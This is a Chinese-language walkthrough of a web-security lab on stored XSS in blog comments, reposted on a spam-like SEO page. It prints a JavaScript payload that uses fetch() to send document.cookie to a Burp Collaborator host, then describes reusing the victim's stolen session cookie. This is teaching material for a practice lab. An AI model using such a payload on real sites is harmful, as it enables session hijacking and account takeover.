当前位置: 首页 > news >正文

烟台网站搜索优化/搜索引擎广告案例

烟台网站搜索优化,搜索引擎广告案例,上海网站排名优化费用,武汉建设网站的公司简介靶场内容 本实验包含博客评论功能中的存储型 XSS漏洞。一个模拟的受害者用户在发布后查看所有评论。为解决实验室,利用该漏洞窃取受害者的会话cookie,然后使用该cookie来冒充受害者。 注意 为了防止 Academy 平台被用来攻击第三方,我们的防火…

靶场内容

本实验包含博客评论功能中的存储型 XSS漏洞。一个模拟的受害者用户在发布后查看所有评论。为解决实验室,利用该漏洞窃取受害者的会话cookie,然后使用该cookie来冒充受害者。

注意
为了防止 Academy 平台被用来攻击第三方,我们的防火墙会阻止实验室与任意外部系统之间的交互。要解决实验室问题,您应该使用 Burp Collaborator 的默认公共服务器 ( burpcollaborator.net)。

一些用户会注意到这个实验室有一个不需要 Burp Collaborator 的替代解决方案。然而,它远没有泄露 cookie 那么微妙。

解决方法

  • XSS窃取Cookie老生常谈了,最喜欢用的就是窃取Cookie了
  • 这个靶场还是很细的:
  • 找到一个评论区,将JavaScript代码复制到评论区
<script>
fetch('https://8r0adoyya8wnsy5t6m21h3twenkd82.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
  • fetch里面的URL内容是Burp Collaborator Client出来的payload
  • 之后打开Burp Collaborator Client,可以发现有个HTTP报文
  • 点开它,里面是管理员的sessionimage
  • 之后使用这个cookie去覆盖home页面的cookie就可以解决战斗了image
http://www.lbrq.cn/news/830611.html

相关文章:

  • 网站建设源代码共享/推广渠道有哪些
  • 沈阳做网站公司有哪些/集客营销软件官方网站
  • wordpress运行php/武汉抖音seo搜索
  • asp做网站计数器/seo营销
  • 如何做一个动态网站/如何给自己的公司建网站
  • 名字做藏头诗的网站/王通seo教程
  • 网站文件验证/今日最新重大新闻
  • 网站建设 商业价值/站长素材官网
  • 票务网站建设/福州seo建站
  • 福州市交通建设集团有限公司 网站/百度快照是怎么做上去的
  • 苍南网站设计公司/全网营销思路
  • 安徽省芜湖建设定额网站/企业网络营销方案
  • 福州建设高端网站/徐州seo培训
  • 做网站用什么语言制作最安全/市场监督管理局职责
  • 网站制作价格怎么算/营销软文
  • 网站开发的时间流程/强力搜索引擎
  • 萧山做网站的企业/百度网盘搜索引擎入口
  • 网络服务公司名字/优化搜狗排名
  • 建网站热线电话/搜索引擎优化策略
  • 高端做网站多少钱/网络营销网站推广
  • 网站建设在作用是什么意思/优化推广联盟
  • 怎么推广自己的公司网站/平台优化是什么意思
  • 企业网站建设哪家便宜/抖来查关键词搜索排名
  • 网站设置反爬虫的常用方法有哪些/网店运营培训哪里好
  • 云南集优科技网站/福州百度推广优化排名
  • 制作网站吗/优化系统的软件
  • 微信网站搭建价格/怎么进行网站推广
  • 北京顺义区住房和城乡建设委员会网站/百度怎样发布作品
  • 如何做网站视频模板/东莞网站推广及优化
  • 怎样做网站的测试与维护/信阳seo推广
  • 物联网iot、mqtt协议与华为云平台的综合实践(万字0基础保姆级教程)
  • Ubuntu网卡驱动无效,不能连接wifi上网
  • 一文了解CDA
  • 区别下IO多路复用,reactor,事件循环(EventLoop),Epoll这几个的概念以及之间的关系
  • Clip微调系列:《MaPLe: Multi-modal Prompt Learning》
  • 区块链之Casper协议背景、演变发展、运作机制和潜在风险